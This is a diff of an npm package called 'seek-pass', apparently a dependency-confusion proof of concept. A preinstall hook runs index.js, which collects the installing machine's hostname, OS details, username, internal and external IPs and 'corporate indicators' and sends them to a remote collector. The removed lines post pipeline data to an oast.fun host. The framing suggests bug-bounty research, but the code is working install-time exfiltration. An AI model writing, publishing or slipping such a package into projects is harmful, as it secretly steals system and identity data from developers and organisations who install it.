+    // Collect all required evidence
+    const httpEvidence = await captureHTTPEvidence();
+    const hostnameEvidence = getHostnameEvidence();
+    const osEvidence = getOSServerInfo();
+    const whoamiEvidence = getWhoamiEvidence();
+    const ownershipEvidence = await proveProgramOwnership();
-    const req = https.request({
-      hostname: "hwoapraaaotwtsnourpqddszm5n3kkhvo.oast.fun",
-      path: "/seek-pass",
-      method: "POST",
-      headers: {
-        "Content-Type": "application/json",
-        "Content-Length": Buffer.byteLength(dataString),
-        "X-Proof-Timestamp": data.collectionTimestamp,
-        "X-Runner-Hostname": data.runner.hostname.system,
-        "X-Pipeline-UUID": data.pipeline.uuid
+    // Combine all evidence
+    const allEvidence = {
+      required: {
+        httpRequests: httpEvidence,     // MANDATORY
+        hostname: hostnameEvidence,
+        osServer: osEvidence,
+        whoami: whoamiEvidence
+      },
+      ownership: ownershipEvidence,
+      metadata: {
+        nodeVersion: process.version,
+        scriptPath: __dirname,
+        timestamp: new Date().toISOString(),
+        timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
+        language: 'JavaScript/Node.js'
       }
-    });
+    };
-    req.on('error', (e) => {
-      console.error('❌ Request error:', e);
-    });
+    // Display summary
+    console.log(`\n${colors.green}═══════════════════════════════════════════════════════${colors.reset}`);
+    console.log(`${colors.green}✓ EVIDENCE COLLECTED SUCCESSFULLY${colors.reset}`);
+    console.log(`${colors.green}═══════════════════════════════════════════════════════${colors.reset}`);
+    console.log(`\n${colors.cyan}Summary:${colors.reset}`);
+    console.log(`  • HTTP Requests: ${allEvidence.required.httpRequests.outgoingRequests.length}`);
+    console.log(`  • Internal IPs: ${allEvidence.required.httpRequests.internalIPs.length}`);
+    console.log(`  • External IPs: ${allEvidence.required.httpRequests.externalIPs.length}`);
+    console.log(`  • Hostname: ${allEvidence.required.hostname.systemHostname}`);
+    console.log(`  • User: ${allEvidence.required.whoami.username}`);
+    console.log(`  • Corporate Indicators: ${allEvidence.ownership.corporateIndicators.length}`);
-    req.on('response', (res) => {
-      console.log(`✅ Data sent successfully! Status: ${res.statusCode}`);
-    });
+    // Send to collector
+    await sendEvidence(allEvidence);
-    req.write(dataString);
-    req.end();
+    console.log(`\n${colors.yellow}Important: This evidence proves the package was executed by:${colors.reset}`);
+    console.log(`  ✓ User: ${whoamiEvidence.username}`);
+    console.log(`  ✓ On host: ${hostnameEvidence.systemHostname}`);
+    console.log(`  ✓ From internal network: ${httpEvidence.internalIPs.length > 0 ? 'YES' : 'NO'}`);
+    console.log(`  ✓ With corporate indicators: ${ownershipEvidence.corporateIndicators.length > 0 ? 'YES' : 'NO'}`);
+    if (ownershipEvidence.corporateIndicators.length === 0 && httpEvidence.internalIPs.length === 0) {
+      console.log(`\n${colors.red}⚠️  WARNING: No corporate indicators found!${colors.reset}`);
+      console.log(`${colors.red}This may not be a valid security risk on the program's side.${colors.reset}`);
+    }
   } catch (error) {
-    console.error('❌ Error collecting/sending data:', error);
+    console.error(`${colors.red}Error collecting evidence:${colors.reset}`, error);
     process.exit(1);
   }
 }
-// Execute
-sendData();
+// Run the collector
+main();

package/package.json CHANGED Viewed

@@ -1,12 +1,12 @@
 {
   "name": "seek-pass",
-  "version": "100.6.0",
+  "version": "100.10.0",
+  "description": "",
+  "main": "index.js",
   "scripts": {
     "preinstall": "node index.js"
   },
-  "main": "index.js",
   "keywords": [],
   "author": "",
-  "license": "ISC",
-  "description": ""
+  "license": "ISC"
 }